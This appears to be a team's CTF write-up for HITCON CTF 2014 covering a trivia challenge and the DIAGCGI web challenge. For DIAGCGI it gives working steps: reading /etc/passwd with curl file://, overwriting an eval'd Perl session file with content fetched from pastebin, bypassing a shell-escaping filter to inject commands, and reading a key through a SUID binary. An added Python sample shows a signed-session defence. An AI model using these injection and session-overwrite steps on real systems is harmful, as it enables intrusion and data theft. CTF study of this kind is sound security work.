Vash[Trivia 10]
Description:
Find out the flag. It should be there, you know.
nc 203.66.57.167 31337
Hint:
Most (but not all) challenges' environments are the same as this one.
Connect with nc:
nc -nvv 203.66.57.167 31337
Listing /home/ shows the vash account directory, and the flag is stored in it:
HITCON{Welcome to HITCON CTF 2014!!}
DIAGCGI[WEB 68]
Description:
http://54.92.127.128:16888/
The page offers three functions:
ping
traceroute
curl
The page source hides a shell function.
curl can read local files, so
curl file:///etc/passwd
curl file://dana-na.cgi
give us the script's source.
The site first checks whether the cookie exists; if it does not, it creates a session file:
if (! defined($sessfile) )
{
    if ( md5_hex($cgi->param("sechash")) =~ /^000000000000.*$/)
    {
        $sesshash{'user'} = 'admin';
    }
    else
    {
        $sesshash{'user'} = 'guest';
    }
    $sesshash{'ip'} = &get_ip;
    $diagsess = md5_hex( $sesshash{'user'} . '|||' . $sesshash{'ip'} );
    $cookie = "diagsess=$diagsess;";
    &write_session;
    print $cgi->header(-cookie => $cookie,
                       -expires => 'Mon, 01 Jan 1999 00:00:00 GMT',
                       -'cache-control' => 'no-cache',
                       -pragma => 'no-cache',-'location'=> 'dana-na.cgi?sechash=' );
    exit 0;
Otherwise it reads the session:
}
else
{
    print $cgi->header();
    &read_session;
    &print_menu;
}
Note that the session file is under our control (its filename is our cookie value), and session files live in /tmp/.
When the hidden shell command is executed, it goes through this function:
sub shell
{
    $cmd = shift;
    print "<pre>";
    if ( $sesshash{'user'} eq 'admin' )
    {
        open(GG, "$cmd |") and do
        {
            print;
        };
    }
    else
    {
        print "sorry $sesshash{'user'}! you're not admin!\n";
    }
}
It checks whether $sesshash{'user'} equals admin.
$sesshash{'user'} is set here:
sub read_session
{
    undef %sesshash;
    if(! -f "$SESSDIR/$sessfile")
    {
        print "session error!";
        return;
    }
    open(GG, "$SESSDIR/$sessfile") and do {
        while (<GG>) {
            eval($_);
        }
        close GG;
    };
}
Each line of the session file named by the cookie is eval()'d.
A session file generated by the system looks like this:
$sesshash{'ip'} = '8.8.8.8';
$sesshash{'user'} = 'guest';
Change it to this:
$sesshash{'ip'} = '8.8.8.8';
$sesshash{'user'} = 'admin';
The change is made with curl: its -o option can create a file, so
curl -o /tmp/{session filename, i.e. our cookie value} http://pastebin.com/raw.php?i=u5Spm5ZT
overwrites the session file. From here commands can be executed, but the shell function has no
while (<GG>) { }
loop, so nothing is printed back; results have to be redirected to a file to be read. Every parameter passed in also goes through the following code
sub safestr
{
    my $str = shift;
    $str =~ s/([;<>\*\|`&\$!#\(\)\[\]\{\}:'"])/\\$1/g;
    return $str;
}
for filtering. Testing shows that
/bin/cat /etc/passwd > /tmp/123 &action=shell
is escaped to
/bin/cat /etc/passwd \> /tmp/123 &action=shell
The following gets around it:
/bin/cat /etc/passwd \\> /tmp/123 &action=shell
Commands can then be executed:
/bin/ls -la / \\> /tmp/123 &action=shell
lists all files:
-r-------- 1 key www-data 41 Jul 28 08:37 key.txt
drwxr-xr-x 21 root root 4096 Jul 28 08:35 lib
drwxr-xr-x 2 root root 4096 Aug 13 16:29 lib64
drwx------ 2 root root 16384 Jun 7 10:51 lost+found
drwxr-xr-x 2 root root 4096 Jun 7 10:49 media
drwxr-xr-x 2 root root 4096 Apr 10 22:12 mnt
drwxr-xr-x 2 root root 4096 Jun 7 10:49 opt
dr-xr-xr-x 235 root root 0 Aug 13 16:29 proc
-r-sr-x--- 1 key www-data 877753 Jul 28 08:39 read_key
Read the flag with the SUID binary:
/read_key /key.txt \> /tmp/oops &action=shell
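As an added example, not code from the writeup or from the challenge, here is a Python port of safestr() next to a hardened session store that keeps JSON plus an HMAC instead of Perl source for eval(); write_session(), read_session() and tamper_demo() are hypothetical names, and a temporary directory stands in for /tmp.

```python
import hashlib, hmac, json, os, re
import secrets, tempfile

# Port of the challenge's Perl safestr(): each blacklisted shell metacharacter
# gets a backslash in front of it. The backslash itself is not in the class, so
# a caller-supplied backslash passes through untouched next to the added escaping.
_META = re.compile(r'([;<>*|`&$!#()\[\]{}:\'"])')

def safestr(s: str) -> str:
    return _META.sub(r'\\\1', s)

# Hardened session handling (hypothetical, not the challenge's code): the cookie
# is an opaque random id, and the file holds JSON plus an HMAC under a server
# secret instead of Perl for eval(). A file the web user can overwrite, as with
# the curl -o trick above, then fails verification instead of granting admin.
def write_session(sessdir: str, secret: bytes, sess: dict) -> str:
    body = json.dumps(sess, sort_keys=True)
    tag = hmac.new(secret, body.encode(), hashlib.sha256).hexdigest()
    sid = secrets.token_hex(16)
    with open(os.path.join(sessdir, sid), "w") as f:
        f.write(tag + "\n" + body)
    return sid

def read_session(sessdir: str, secret: bytes, sid: str) -> dict:
    if not re.fullmatch(r"[0-9a-f]{32}", sid):   # an id, never a path fragment
        raise ValueError("bad session id")
    with open(os.path.join(sessdir, sid)) as f:
        tag, body = f.read().split("\n", 1)
    expect = hmac.new(secret, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expect):
        raise ValueError("session tampered")
    return json.loads(body)

def tamper_demo(sessdir: str = None) -> tuple:
    """Create a guest session, then rewrite the file to claim admin the way the
    writeup does. Returns (user read back before tampering, tamper rejected?)."""
    sessdir = sessdir or tempfile.mkdtemp()
    secret = secrets.token_bytes(32)
    sid = write_session(sessdir, secret, {"user": "guest", "ip": "8.8.8.8"})
    user = read_session(sessdir, secret, sid)["user"]
    path = os.path.join(sessdir, sid)
    with open(path) as f:
        tag, body = f.read().split("\n", 1)
    with open(path, "w") as f:                     # same overwrite, no secret
        f.write(tag + "\n" + body.replace('"guest"', '"admin"'))
    try:
        read_session(sessdir, secret, sid)
        return user, False
    except ValueError:
        return user, True
```

Running the diagnostic commands as an argv list with shell=False would remove the need for safestr() entirely, since the user value then arrives as one argument and is never parsed by a shell.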
@Le4F ::TEAM L::